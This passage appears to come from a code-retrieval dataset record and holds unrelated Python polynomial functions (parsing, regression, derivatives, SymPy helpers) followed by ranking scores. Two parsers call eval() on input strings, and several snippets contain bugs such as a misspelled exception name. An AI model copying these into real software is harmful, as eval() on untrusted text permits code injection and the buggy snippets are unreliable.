monomial.poly[1:]:\n term = ensurePoly(term)\n if isinstance(term.poly, (int, float)):\n total += term.poly\n elif isinstance(term.poly, (Variable.Variable)):\n power[orderedVars.index(term.poly)] += 1\n\n power = tuple(power)\n if power not in powers:\n powers[power] = total\n else:\n powers[power] = min(total, powers[power])\n\n finalPoly = Polynomial()\n finalPoly.poly = [\"+\"]\n finalPoly.vars = self.vars.copy()\n for power in sorted(list(powers.keys())):\n monomial = Polynomial()\n monomial.poly = [\"*\"]\n if powers[power] != 0:\n monomial.poly.append(powers[power])\n\n for pow, ind in zip(power, range(len(power))):\n if pow == 0:\n continue\n elif pow == 1:\n monomial.poly.append(orderedVars[ind])\n else:\n monomial.poly.append(orderedVars[ind]**pow)\n finalPoly.poly.append(monomial)\n return finalPoly", "def parse_polynomial(s):\n\n def parse_n(s):\n '''Parse the number part of a polynomial string term'''\n if not s:\n return 1\n elif s == '-':\n return -1\n elif s == '+':\n return 1\n return float(eval(s))\n\n def parse_p(s, powerPattern):\n '''Parse the power part of a polynomial string term'''\n if not s:\n return 0\n multipliers = powerPattern.findall(s)[0]\n if not multipliers:\n return 1\n return int(multipliers)\n s = str(s).replace(' ', '') # remove all whitespace from string\n m = re.search('[a-zA-Z]+', s)\n try:\n varLetter = m.group(0)\n except AttributeError:\n varLetter = 'P'\n termPattern = re.compile(\n '([+-]?\\d*\\.?\\d*)\\**({var}?\\^?\\d?)'.format(var=varLetter))\n powerPattern = re.compile('{var}\\^?(\\d)?'.format(var=varLetter))\n order_multipliers = {}\n\n for n, p in termPattern.findall(s):\n n, p = n.strip(), p.strip()\n if not n and not p:\n continue\n n, p = parse_n(n), parse_p(p, powerPattern)\n if p in order_multipliers:\n order_multipliers[p] += n\n else:\n order_multipliers[p] = n\n highest_order = max(\n max(order_multipliers.keys()), 1) # order must be at least linear\n multipliers = [0] * (highest_order + 1)\n for key, val in order_multipliers.items():\n multipliers[key] = val\n\n return multipliers", "def __init__(self, pol1, pol2):\n\n self._pol1, self._pol2 = pol1, pol2\n self.deg = self._pol1.deg*self._pol2.deg # degree of composed polynomial\n\n # WARNING: numpy.polynomial.polynomial.polyadd and polypow considers\n # arrays as polynomials with lowest coefficient first,\n # contrarily to polyval and polyfit.\n _pol1, _pol2 = self._pol1.pol[::-1], self._pol2.pol[::-1]\n\n self.pol = np.zeros((1,)) # composed polynomial\n for i in range(pol1.deg + 1):\n self.pol = polyadd(self.pol, _pol1[i]*polypow(_pol2, i))\n\n self.pol = self.pol[::-1]", "def __test_s_polynomial():\n poly_ring = PolynomialRing(QQ, 'x,y', order='deglex')\n x, y = poly_ring('x'), poly_ring('y')\n g = x ** 3 - 2 * x * y\n h = x ** 2 * y - 2 * y ** 2 + x\n print __s_polynomial(g, h) # Expected -x^2", "def polynomialInterpolation(self,s):\n #print(s)\n #s[i]=xi,s[j]=xj\n return Polynomial.createFromInterpolation(s,range(len(s)))\n #return Polynomial(s,T)", "def PolyDiff(u, x, deg = 3, diff = 1, width = 5):\n\n u = u.flatten()\n x = x.flatten()\n\n n = len(x)\n du = np.zeros((n - 2*width,diff))\n\n # Take the derivatives in the center of the domain\n for j in range(width, n-width):\n\n points = np.arange(j - width, j + width)\n\n # Fit to a polynomial\n poly = np.polynomial.chebyshev.Chebyshev.fit(x[points],u[points],deg)\n\n # Take derivatives\n for d in range(1,diff+1):\n du[j-width, d-1] = poly.deriv(m=d)(x[j])\n\n return du", "def poly_regression(self,precision=8):\n # return empty lists if input is empty\n if self.training == []:\n return [],[]\n\n latitudes = []\n longitudes = []\n for point in self.training[:-1]:\n latitudes.append(point[0])\n longitudes.append(point[1]) \n # store everything in a dataframe\n latDf = pd.DataFrame(numpy.array(latitudes), columns=['latitudes'])\n longDf = pd.DataFrame(numpy.array(longitudes), columns=['longitudes'])\n\n # learn how to do regression\n reg = linear_model.LinearRegression()\n\n # pass the order of your polynomial here \n poly = PolynomialFeatures(precision)\n\n \n # regression with latitude as domain\n vertical_predicted_path = []\n transform = poly.fit_transform(longDf)\n\n reg.fit(transform,latDf)\n predictions = reg.predict(transform)\n\n for i in range(len(predictions)):\n vertical_predicted_path.append([predictions[i][0],longDf[\"longitudes\"][i]])\n\n \n # regression with longitude domain\n horizontal_predicted_path = []\n transform = poly.fit_transform(latDf)\n\n reg.fit(transform,longDf)\n predictions = reg.predict(transform)\n\n for i in range(len(predictions)):\n horizontal_predicted_path.append([latDf[\"latitudes\"][i], predictions[i][0]])\n\n self.horizontal = sorted(horizontal_predicted_path, key=lambda k: [k[1], k[0]])\n self.vertical = sorted(vertical_predicted_path, key=lambda k: [k[0], k[1]])\n \n # return sorted horizontal and vertical prediction\n return self.horizontal, self.vertical", "def general_poly (L):\n def to_apply (x):\n n = 0\n for i in L:\n n = x*n + i\n return n\n return to_apply", "def test_polynomial_from_float_list_same_as_from_float_args(self):\n coeffs = [1.0, 2.0, 3.0, 4.0, 5.0]\n\n p1 = Polynomial(coeffs)\n p2 = Polynomial(*coeffs)\n\n self.assertEqual(p1, p2)", "def poly(x, y, pd) :\n # Maximum polynomial degree allowed is 7.\n maxD = 7\n if pd > maxD :\n exit(\"Please choose a reasonable polynomial degree (0 <= pd <= \" + maxD + \").\")\n \n # Make the polynomial matrix one degree at a time.\n p = np.zeros((len(x), int((pd+1)*(pd+2)/2)), float)\n count = 0\n numP = 0\n for i in range(pd + 1) :\n for j in range(numP + 1) :\n if (j == 0) and (numP == 0) :\n p[:,count] = 1\n elif (j == 0) :\n p[:,count] = x**(numP-j)\n elif (numP-j == 0) :\n p[:,count] = y**j\n else :\n p[:,count] = x**(numP-j) * y**j\n count += 1\n numP += 1\n \n return p", "def build_poly(tx, degree) :\n shape = tx.shape\n poly = np.zeros((shape[0], shape[1] * degree))\n poly[:,:shape[1]] = tx\n for deg in range(2, degree + 1) :\n for j in range(0, shape[1]) :\n poly[:, shape[1] * (deg - 1) + j] = tx[:,j] ** deg\n return poly", "def zzx_to_poly(f, *symbols):\n from sympy.polys import Poly\n\n terms = {}\n\n for monom, coeff in zzx_to_dict(f).iteritems():\n terms[(monom,)] = Integer(int(coeff))\n\n return Poly(terms, *symbols)", "def poly_derivative(poly):\n try:\n iter(poly)\n except TypeError:\n return None\n if poly == [] or any(not isinstance(expo, (int, float)) for expo in poly):\n return None\n if len(poly) == 1:\n return [0]\n return [i*expo for i, expo in enumerate(poly)][1:]", "def preprocess_roots(poly):\n coeff = S.One\n\n poly_func = poly.func\n try:\n _, poly = poly.clear_denoms(convert=True)\n except DomainError:\n return coeff, poly\n\n poly = poly.primitive()[1]\n poly = poly.retract()\n\n # TODO: This is fragile. Figure out how to make this independent of construct_domain().\n if poly.get_domain().is_Poly and all(c.is_term for c in poly.rep.coeffs()):\n poly = poly.inject()\n\n strips = list(zip(*poly.monoms()))\n gens = list(poly.gens[1:])\n\n base, strips = strips[0], strips[1:]\n\n for gen, strip in zip(list(gens), strips):\n reverse = False\n\n if strip[0] < strip[-1]:\n strip = reversed(strip)\n reverse = True\n\n ratio = None\n\n for a, b in zip(base, strip):\n if not a and not b:\n continue\n elif not a or not b:\n break\n elif b % a != 0:\n break\n else:\n _ratio = b // a\n\n if ratio is None:\n ratio = _ratio\n elif ratio != _ratio:\n break\n else:\n if reverse:\n ratio = -ratio\n\n poly = poly.eval(gen, 1)\n coeff *= gen**(-ratio)\n gens.remove(gen)\n\n if gens:\n poly = poly.eject(*gens)\n\n if poly.is_univariate and poly.get_domain().is_ZZ:\n basis = _integer_basis(poly)\n\n if basis is not None:\n n = poly.degree()\n\n def func(k, coeff):\n return coeff//basis**(n - k[0])\n\n poly = poly.termwise(func)\n coeff *= basis\n\n if not isinstance(poly, poly_func):\n poly = poly_func(poly)\n return coeff, poly", "def test_polynomial_from_complex_list_same_as_from_complex_args(self):\n coeffs = [1j, 2j, 3j, 4j, 5j]\n\n p1 = Polynomial(coeffs)\n p2 = Polynomial(*coeffs)\n\n self.assertEqual(p1, p2)", "def gen_rand_poly(deg_lower_limit = 1, deg_upper_limit = 10, coeff_limit = 10):\n deg = random.randint(deg_lower_limit,deg_upper_limit)\n coeffs = [random.randint(-coeff_limit, coeff_limit) for _ in range(deg+1)]\n\n # Never have 0 as leading coefficient\n if coeffs[deg] == 0:\n coeffs[deg] = 1\n\n def term(coeff, d):\n if coeff == 0:\n return ''\n elif d == 0:\n return (' + ' if coeff>0 else ' - ') + str(abs(coeff))\n elif d == 1:\n return (' + ' if coeff>0 else ' - ') + (f'{abs(coeff)}x' if abs(coeff)!=1 else 'x')\n elif d == deg:\n return ('' if coeff>0 else '-') + (f'{abs(coeff)}x^{d}' if abs(coeff)!=1 else f'x^{d}')\n else:\n return (' + ' if coeff>0 else ' - ') + (f'{abs(coeff)}x^{d}' if abs(coeff)!=1 else f'x^{d}')\n\n terms = [term(coeffs[d], d) for d in range(deg+1)]\n return deg, coeffs, ''.join([terms[d]for d in range(deg,-1,-1)]).strip('+ ')", "def derivative(self) -> Polynomial:\n coefficients: list[float] = [0] * self.degree\n for i in range(self.degree):\n coefficients[i] = self.coefficients[i + 1] * (i + 1)\n return Polynomial(self.degree - 1, coefficients)", "def coeffients(x, y):\n\n # ensure floating point datatypes\n x.astype(float)\n y.astype(float)\n\n # degree of interpolating polynomial\n n = len(x)\n\n # intitilize list of coeffients for interpolating polynomial to y values\n c = y.tolist()\n\n # compute coeffients\n for j in range(1, n):\n for i in range(n-1, j-1, -1):\n c[i] = float(c[i]-c[i-1])/float(x[i]-x[i-j])\n\n # return an array of polynomial coefficient, note: reverse order for np.polyval function\n return np.array(c[::-1])", "def tensdot(polyList,order,trunc):\n\n def reshape(poly,expo):\n\n poly.coef = poly[:][:,expo]\n poly.expo = expo\n return poly\n\n dim = len(polyList)\n expo = indextens(order,dim,trunc)\n nbrPoly = expo.shape[1]\n coef = np.eye(nbrPoly)\n\n # Tensor product of the univariate basis\n\n for i in range(dim): polyList[i] = reshape(polyList[i],expo[i])\n for i in range(nbrPoly): coef[i] = np.prod([polyList[j][expo[j,i]] for j in range(dim)],axis=0)\n\n poly = Polynomial(expo,coef,1)\n return poly", "def polygen(count=10, sum_count=10, deg=5, cof=10):\n\n s = enumi_beg\n ans = enumi_beg\n\n for i in range(count):\n s += item_beg\n ans += item_beg\n p = genpoly(sum_count, deg, cof)\n ans += p.print_out()\n s += p.rep + item_end\n ans += item_end\n s += enumi_end\n ans += enumi_end\n return s, ans", "def general_poly (L):\n def inside(x):\n result = 0\n pwr = len(L) - 1\n for l in L:\n result = result + l * x ** pwr\n pwr -= 1\n return result\n return inside", "def _eval_legpoly(self, t_0, t_s, p_0, p_s, geometry=None):\n\n assert geometry is not None, \"Geometry needs to be specified!\"\n\n theta_0 = sp.Symbol(\"theta_0\")\n theta_s = sp.Symbol(\"theta_s\")\n theta_ex = sp.Symbol(\"theta_ex\")\n phi_0 = sp.Symbol(\"phi_0\")\n phi_s = sp.Symbol(\"phi_s\")\n phi_ex = sp.Symbol(\"phi_ex\")\n\n res = self.legexpansion(t_0, t_s, p_0, p_s, geometry).xreplace(\n {\n theta_0: t_0,\n theta_s: t_s,\n phi_0: p_0,\n phi_s: p_s,\n theta_ex: t_s,\n phi_ex: p_s,\n }\n )\n return res.evalf()", "def derivative(polinom):\n l = []\n for i in range(1, polinom.degree+1):\n l.append(polinom.coefficients[i]*i)\n return Polinom(l)", "def construct_polynomial_approx(degree, weights):\n # here is a function that is created on the fly from the input feature\n # mapping and weights\n def prediction_function(xs):\n expanded_xs = np.matrix(expand_to_monomials(xs, degree))\n ys = expanded_xs*np.matrix(weights).reshape((len(weights),1))\n return np.array(ys).flatten()\n # we return the function reference (handle) itself. This can be used like\n # any other function\n return prediction_function", "def _reform_poly_coefficients(fit_poly_x, fit_poly_y):\n # Extract values for CD matrix and recombining\n c11 = fit_poly_x.c1_0.value\n c12 = fit_poly_x.c0_1.value\n c21 = fit_poly_y.c1_0.value\n c22 = fit_poly_y.c0_1.value\n sip_poly_x = fit_poly_x.copy()\n sip_poly_y = fit_poly_y.copy()\n # Force low order coefficients to be 0 as defined in SIP\n sip_poly_x.c0_0 = 0\n sip_poly_y.c0_0 = 0\n sip_poly_x.c1_0 = 0\n sip_poly_x.c0_1 = 0\n sip_poly_y.c1_0 = 0\n sip_poly_y.c0_1 = 0\n\n cdmat = ((c11, c12), (c21, c22))\n invcdmat = npla.inv(np.array(cdmat))\n degree = fit_poly_x.degree\n # Now loop through all remaining coefficients\n for i in range(0, degree + 1):\n for j in range(0, degree + 1):\n if (i + j > 1) and (i + j < degree + 1):\n old_x = getattr(fit_poly_x, f'c{i}_{j}').value\n old_y = getattr(fit_poly_y, f'c{i}_{j}').value\n newcoeff = np.dot(invcdmat, np.array([[old_x], [old_y]]))\n setattr(sip_poly_x, f'c{i}_{j}', newcoeff[0, 0])\n setattr(sip_poly_y, f'c{i}_{j}', newcoeff[1, 0])\n\n return cdmat, sip_poly_x, sip_poly_y", "def Hdiv_polynomials(\n domain_dim: int, range_dim: int, order: int, variables: AxisVariablesNotSingle = x\n) -> typing.List[VectorFunction]:\n assert domain_dim == range_dim\n if domain_dim == 2:\n return [VectorFunction((\n variables[0] * variables[0] ** (order - 1 - j) * variables[1] ** j,\n variables[1] * variables[0] ** (order - 1 - j) * variables[1] ** j,\n )) for j in range(order)]\n if domain_dim == 3:\n basis: typing.List[VectorFunction] = []\n for j in range(order):\n for k in range(order - j):\n p = variables[0] ** (order - 1 - j - k) * variables[1] ** j * variables[2] ** k\n basis.append(VectorFunction((variables[0] * p, variables[1] * p, variables[2] * p)))\n return basis\n\n raise ValueError(f\"Unsupported dimension: {domain_dim}\")", "def equations(p):\n [x, y] = p\n list = [x - 5 , y - 5]\n return list", "def _evalPoly(self,a,x):\n y = a[0]\n for i in range(1,len(a)):\n y = self.F.Multiply(y, x)\n y = self.F.Add(y, a[i])\n return y", "def Hdiv_quolynomials(\n domain_dim: int, range_dim: int, order: int, variables: AxisVariablesNotSingle = x\n) -> typing.List[VectorFunction]:\n assert domain_dim == range_dim\n basis: typing.List[VectorFunction] = []\n for d in range(domain_dim):\n for j in product(range(order), repeat=domain_dim - 1):\n poly = 1\n for a, b in zip(variables, j[:d] + (order,) + j[d:]):\n poly *= a ** b\n basis.append(VectorFunction([poly if i == d else 0 for i in range(domain_dim)]))\n return basis", "def construct3rdSumPoly(E):\n if E.a1() != 0 or E.a2() != 0 or E.a3() != 0:\n raise TypeError('Provided elliptic curve is not in the short Weierstrass form.') \n \n FF = E.base_field()\n A = E.a4()\n B = E.a6()\n PR.<s1, s2, s3> = PolynomialRing(FF, 3, order='degrevlex')\n smp = (s1 - s2)**2*s3**2 - 2*((s1 + s2)*(s1*s2 + A) + 2*B)*s3 + (s1*s2 - A)**2 - 4*B*(s1 + s2)\n return smp", "def build_poly(x, degree):\n \n X = np.vander((x[:,0]).T, degree+1, increasing=True)\n \n for i in range(1,np.shape(x)[1],1):\n feat = (x[:,i]).T\n vander = np.vander(feat, degree+1, increasing=True)\n #remove the column of 1 at the beginning of each vander\n vander = np.delete(vander, 0,axis = 1)\n #concatenation\n X = np.concatenate((X, vander), axis=1)\n \n return X", "def parameters_polynomial(cobj, prop, prop_units, alist, blist):\n for i, aval in enumerate(alist):\n if i == 0:\n param_units = prop_units\n else:\n param_units = prop_units / pyunits.K**i\n\n coeff = Var(doc=\"A parameter for CoolProp polynomial form\", units=param_units)\n cobj.add_component(prop + \"_coeff_A\" + str(i), coeff)\n coeff.fix(aval)\n\n for i, bval in enumerate(blist):\n if i == 0:\n param_units = pyunits.dimensionless\n else:\n param_units = pyunits.K**-i\n\n coeff = Var(doc=\"B parameter for CoolProp exponential form\", units=param_units)\n cobj.add_component(prop + \"_coeff_B\" + str(i), coeff)\n coeff.fix(bval)", "def generate_poly(hyper, params):\n\n k, d = hyper['k'], hyper['d']\n #atoms = { \n # (h,) : symbols('h_%d'%h)\n # for h in xrange(1, k+1)\n # }\n #atoms[(k,)] = 1. - sum( symbols('h_%d'%h) for h in xrange(1, k) )\n\n atoms = {}\n for h in xrange(1,k+1):\n atoms.update({ \n (h,x1) : symbols('x_%d%d'%(h,x1))\n for x1 in xrange(1,d+1)\n })\n #atoms[(h,d)] = 1. - sum(symbols('x_%d%d'%(h,x1)) for x1 in xrange(1,d))\n\n m = {}\n for x1 in xrange(1,d+1):\n m[(x1,)] = poly( sum( atoms[(h,x1)] for h in xrange(1,k+1) ) )\n for x2 in xrange(1,d+1):\n m[(x1,x2)] = poly( sum( atoms[(h,x1)] * atoms[(h,x2)] for h in xrange(1,k+1) ) )\n for x3 in xrange(1,d+1):\n m[(x1,x2,x3)] = poly( sum( atoms[(h,x1)] * atoms[(h,x2)] * atoms[(h,x3)] for h in xrange(1,k+1) ) )\n\n return m", "def general_poly (L):\r\n\r\n def secondFunc(x):\r\n total = 0\r\n listLength = len(L)-1\r\n for i in L:\r\n total += i * x**listLength\r\n listLength -= 1\r\n return(total)\r\n return secondFunc", "def __polydiff__(x, dt, params, options=None):\n if isinstance(options, dict) and 'weights' in options.keys():\n w = options['weights']\n else:\n w = np.ones_like(x)\n\n if isinstance(params, list):\n order = params[0]\n else:\n order = params\n\n t = np.arange(1, len(x)+1)*dt\n\n # polyfit\n r = np.polyfit(t, x, order, w=w)[::-1]\n\n # derivative coefficients\n dr = copy.copy(r[1:])\n for i, _ in enumerate(dr):\n dr[i] = dr[i]*(i + 1)\n\n # evaluate dxdt_hat\n dxdt_hat = 0\n for i, _ in enumerate(dr):\n dxdt_hat += dr[i]*t**i\n\n # evaluate smooth x\n x_hat = 0\n for i, _ in enumerate(r):\n x_hat += r[i]*t**i\n\n return x_hat, dxdt_hat", "def PolyDiffPoint(u, x, deg = 3, diff = 1, index = None):\n \n n = len(x)\n if index == None: index = int((n-1)/2)\n\n # Fit to a polynomial\n poly = np.polynomial.chebyshev.Chebyshev.fit(x,u,deg)\n \n # Take derivatives\n derivatives = []\n for d in range(1,diff+1):\n derivatives.append(poly.deriv(m=d)(x[index]))\n \n return derivatives", "def _getFrac(expr):\n expr=expr.replace(' ', '')\n l = len(expr)\n frac = []; start = 0; par = 0\n pack=''; num=''\n op = ['+','-']\n operator = ['+','-','/','*']\n sym = ['x','y']\n multFrac = False\n\n for i in range(0,l):\n if expr[i]=='(' : #(\n if par==0 : start=i\n par += 1\n elif expr[i] == ')' : #)\n par -= 1\n if par==0 :\n pack += expr[start:i+1]; start = i+1\n elif expr[i]=='*'and par==0: #*\n pack += expr[start:i]; start = i+1\n if num!='' :\n frac.append((num,pack))\n frac.append(expr[i])\n pack = ''; num = ''\n else :\n pack += expr[i]\n elif expr[i]=='/'and par==0: #/\n pack += expr[start:i]\n num += pack\n pack = ''\n start = i+1\n elif expr[i] in op and par==0 and num != '': #+-\n pack += expr[start:i]\n frac.append((num,pack))\n frac.append(expr[i])\n pack = ''; num = ''; start = i+1\n elif expr[i] in op and par==0:\n pack += expr[start:i]\n frac.append((pack,''))\n frac.append(expr[i])\n pack = ''; num = ''; start = i+1\n\n if start < l : pack += expr[start:l]\n if num != '' :\n frac.append((num,pack))\n else:\n frac.append((pack,''))\n\n frac2 = [frac[0]]\n i=1\n while i<len(frac):\n if frac[i] in operator and frac[i]!='*' :\n frac2.append(frac[i])\n frac2.append(frac[i+1])\n elif frac[i]=='*' :\n (a1,b1)=frac[i-1]\n (a2,b2)=frac[i+1]\n frac2[len(frac2)-1]=(a1+'*'+a2,b1+'*'+b2)\n i+=2\n return frac2", "def strMultiPoly(poly, symbol=[\"X\",\"Y\"], asc=True):\n return termorder.MultivarTermOrder(cmp).format(MultiVarPolynomial(poly,symbol), symbol, asc)", "def build_poly(x, degree):\n tx = np.zeros((x.shape[0], x.shape[1]*(degree+1)))\n \n for j in range(degree+1):\n tx[:,x.shape[1]*j:x.shape[1]*(j+1)] = np.power(x,j)\n \n return tx", "def nice_cubic_polynomial(p):\n tmp = \"\"\n if p[\"a\"] == 1:\n tmp += \" x^3\"\n elif p[\"a\"] != 0:\n tmp += \"%.2fx^3\" % p[\"a\"]\n if p[\"b\"] == 1:\n tmp += \"\\t+ x^2\"\n elif p[\"b\"] != 0:\n tmp += \"\\t+ %.2fx^2\" % p[\"b\"]\n else:\n tmp += \"\\t\\t\"\n if p[\"c\"] == 1:\n tmp += \"\\t+ x\"\n elif p[\"c\"] != 0:\n tmp += \"\\t+ %.2fx\" % p[\"c\"]\n else:\n tmp += \"\\t\\t\"\n if p[\"d\"] != 0:\n tmp += \"\\t+ %.2f\" % p[\"d\"]\n return tmp", "def polyrecur(order,dist,trunc=1):\n\n printer(0,'Computing polynomials ...')\n if not isinstance(dist,Joint): dist = Joint(dist)\n\n nbrPoly = order+1\n dim = dist[:].shape[0]\n expo = np.arange(nbrPoly)\n coef = np.zeros((nbrPoly,nbrPoly))\n norm = np.ones((dim,nbrPoly))\n\n coef[0,0] = 1\n polyList = []\n\n # Creates the univariate polynomial basis\n\n for i in range(dim):\n\n polyList.append(Polynomial(expo,coef))\n AB = dist[i].coef(nbrPoly)\n\n for j in range(1,nbrPoly):\n\n norm[i,j] = norm[i,j-1]*AB[1,j]\n polyList[i][j] = np.roll(polyList[i][j-1],1,axis=0)\n polyList[i][j] -= AB[0,j-1]*polyList[i][j-1]+AB[1,j-1]*polyList[i][j-2]\n\n # Normalization and tensor product\n\n for i in range(dim): polyList[i][:] /= np.sqrt(norm[i,:,None])\n poly = tensdot(polyList,order,trunc)\n\n printer(1,'Computing polynomials 100 %')\n return poly", "def test_polynomial_from_string_the_same_as_string_args(self):\n coeffs = \"abcdefghijklmnopqrstuvwxyz\"\n\n p1 = Polynomial(coeffs)\n p2 = Polynomial(*coeffs)\n\n self.assertEqual(p1, p2)", "def part_der(f,l):\r\n \r\n der = [] #empty list which derived functions will be appended onto\r\n for i in l:\r\n \r\n der.append(sym.diff(f, lambda i: f))\r\n print(der) \r\n return der", "def poly(x, coeffs):\n return np.sum([coeffs[i] * x ** i for i in range(len(coeffs))], axis=0)", "def PBpoly(n, x):\n n = int(n)\n return Bpoly(n, x-math.floor(x))", "def minpoly(firstterms):\n field = ring.getRing(firstterms[0])\n r_0 = uniutil.polynomial({len(firstterms):field.one}, field)\n r_1 = uniutil.polynomial(enumerate(reversed(firstterms)), field)\n poly_ring = r_0.getRing()\n v_0 = poly_ring.zero\n v_1 = poly_ring.one\n n = len(firstterms) // 2\n\n while n <= r_1.degree():\n q, r = divmod(r_0, r_1)\n v_0, v_1 = v_1, v_0 - q*v_1\n r_0, r_1 = r_1, r\n return v_1.scalar_mul(v_1.leading_coefficient().inverse())", "def E_polynomial(self):\n\n from nodepy import stability_function\n p, q = self.stability_function()\n return stability_function.E_polynomial(p, q)", "def generate_random_tropical_poly(max_degree, min_coefficient, max_coefficient):\n coefficients = []\n for d in range(0, random.randint(1, max_degree) + 1):\n coefficients.append(random.randint(min_coefficient, max_coefficient))\n return coefficients", "def anti_deriv(self):\n poly_anti_deriv = [0]\n for i, val in enumerate(self.coeff):\n poly_anti_deriv.append(round(val/(i+1.0), 2))\n return Poly(poly_anti_deriv)", "def calc_poly_linear_regression(independent, dependent):\n # Reshape for sklearn\n independent = independent.values.reshape(-1,1)\n dependent = dependent.values.reshape(-1,1)\n # Make the whole thing poly\n poly = PolynomialFeatures(degree=2)\n independent_ = poly.fit_transform(independent)\n # Do the linear regression\n model = LinearRegression()\n model.fit(independent_, dependent)\n # Calculate R2\n return model.score(independent_, dependent)", "def poly(x, degree=2):\n x = np.array(x)\n X_trans = np.transpose(np.vstack((x**k for k in range(degree + 1))))\n return np.linalg.qr(X_trans)[0][:, 1:]", "def poly(*args):\n if len(args) == 0 or len(args) == 2:\n raise ValueError('bad number of arguments {} passed to poly()'.format(len(args)))\n if len(args) == 1:\n if ispoly(args[0]):\n return deepcopy(args[0])\n else:\n raise VauleError('non-poly list passed to poly()')\n # args is of length 3 or greater. Check to see if args are points\n a = list(args)\n b = list(filter(lambda x: not ispoint(x),a))\n if len(b) > 0:\n raise ValueError('non-point arguments to poly(): {} '.format(b))\n return deepcopy(a)", "def addPol(*pol):\n\n sum = np.zeros((1,))\n for p in pol:\n sum = polyadd(sum, p)\n\n return sum", "def factor_polynomial(a,b,c):\r\n afacts = factors(abs(a))\r\n cfacts = factors(abs(c))\r\n #choose a factor of a (d), then f is a/d and so on\r\n for d in afacts:\r\n for g in cfacts:\r\n f = a/d\r\n e = c/g\r\n if e*f + d*g == b:\r\n print(\"{}*x**2 + {}*x + {} = ({}x + {})({}x + {})\".format(a,b,c,d,int(e),int(f),g))\r\n return\r\n #return False\r", "def get_poly(kwargs):\n from sklearn.preprocessing import PolynomialFeatures\n return PolynomialFeatures(**kwargs)", "def __merge(self, inputPoly, op):\n newPoly = Polynomial()\n\n # cast the input to a Polynomial\n inputPoly = ensurePoly(inputPoly)\n if isinstance(inputPoly.poly, (int, float, Variable.Variable)):\n input = Polynomial()\n input.poly = [op, inputPoly.poly]\n else:\n input = inputPoly\n\n if isinstance(self.poly, (int, float, Variable.Variable)):\n self.poly = [op, self.poly]\n\n if op == self.poly[0] and op == input.poly[0]:\n newPoly.poly = self.poly + input.poly[1:]\n elif op == self.poly[0]:\n newPoly.poly = self.poly\n newPoly.poly.append(input)\n elif op == input.poly[0]:\n newPoly.poly = [input.poly[0], self]\n newPoly.poly.extend(input.poly[1:])\n else:\n newPoly.poly = [op, self, input]\n\n return newPoly", "def polyfit(dates, levels, p):\n x = matplotlib.dates.date2num(dates)\n\n y = levels\n\n # Using shifted x values, find coefficient of best-fit\n # polynomial f(x) of degree p\n shifted_times = [t-x[0] for t in x]\n p_coeff = np.polyfit(shifted_times, y, p)\n\n # Convert coefficient into a polynomial that can be evaluated\n # e.g. poly(0.3)\n poly = np.poly1d(p_coeff)\n\n return (poly, x[0])", "def reducedFormOne(self, equation):\n splitter = re.split('(\\+|\\-)', equation)\n newEquation = str()\n state = 0\n for token in splitter:\n if '(' in token or state > 0 or '[' in token:\n state += 1\n newEquation += token\n continue\n if ')' in token or ']' in token:\n state -= 1\n continue\n if '^' + self.var in token:\n newEquation += token\n self.validPolynome = False\n continue\n find = re.findall('(\\*|\\^|\\/)?(' + self.var + ')(\\^\\d+)?' , token)\n newVar = []\n for var in find:\n newVar.append(''.join(map(str,var)))\n for var in newVar:\n token = token.replace(var, '')\n if token != '+' and token != '-' and token != '':\n try:\n newEquation += str(eval(token.replace('^', '**'))) + ''.join(newVar)\n except:\n self.error = True\n continue\n else:\n newEquation += token\n return newEquation", "def _polynomial_entity(value, context):\n assert isinstance(value, Polynomial)\n coefficients = np.asarray(value.coefficients)\n num_variables = coefficients.ndim\n variables = [sympy.Symbol(context.pop()) for _ in range(num_variables)]\n function_symbol = context.pop()\n handle = FunctionHandle(function_symbol)\n handle_description = sympy.Function(function_symbol)(*variables)\n\n polynomial = polynomials.coefficients_to_polynomial(coefficients, variables)\n polynomial = polynomial.sympy()\n\n return Entity(\n context=context,\n value=value,\n expression=polynomial,\n polynomial_variables=variables,\n description='Let {function} = {polynomial}.',\n handle=handle,\n function=handle_description,\n polynomial=polynomial)" ]
[ "0.6846461", "0.65011793", "0.6292352", "0.6274255", "0.62225056", "0.61097145", "0.60969347", "0.6090148", "0.60779357", "0.60200155", "0.60196537", "0.59783614", "0.5969226", "0.5965326", "0.5856345", "0.5849811", "0.58080703", "0.5775723", "0.5735005", "0.5733751", "0.5722096", "0.5698544", "0.56953406", "0.56824267", "0.5653592", "0.5636684", "0.563195", "0.56265783", "0.56259936", "0.55919147", "0.55880266", "0.5585891", "0.5576518", "0.5575801", "0.5565807", "0.55617356", "0.5559807", "0.555813", "0.5551955", "0.55366033", "0.5531899", "0.5521932", "0.55078155", "0.55027956", "0.54881066", "0.5472018", "0.5467412", "0.5459621", "0.54507357", "0.5449399", "0.54257417", "0.5409083", "0.53826433", "0.5372734", "0.53560984", "0.5348208", "0.53363293", "0.5330159", "0.53247994", "0.53188366", "0.53168577", "0.529635", "0.52777994", "0.52713233", "0.5267082", "0.5258767", "0.52576727", "0.5250707", "0.52387667", "0.523134", "0.52311265", "0.521637", "0.5212681", "0.52106714", "0.5195989", "0.5189531", "0.51671946", "0.5159518", "0.51566106", "0.5144678", "0.51300174", "0.5122544", "0.51157093", "0.5110835", "0.51055366", "0.5098564", "0.50945264", "0.50908965", "0.5087293", "0.50872725", "0.50866365", "0.50831044", "0.5082207", "0.5081495", "0.50732553", "0.5072947", "0.5071048", "0.50679743", "0.50673664", "0.5057545" ]
0.70788777
0